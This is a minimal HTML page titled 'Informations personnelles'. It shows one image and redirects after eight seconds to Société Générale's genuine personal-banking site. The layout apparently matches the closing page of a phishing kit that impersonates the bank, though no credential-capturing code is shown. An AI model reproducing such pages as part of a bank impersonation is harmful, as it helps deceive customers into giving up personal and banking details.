<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<title>Informations personnelles</title>
		<link href="styles.css" rel="stylesheet" type="text/css">
		<META http-equiv="refresh" content="8; URL=https://particuliers.societegenerale.fr">

	</head>
	<body>
		<div id="background">
			<div id="Calque0"><img src="images/Calque0.png"></div>
		</div>
 </body>
 </html>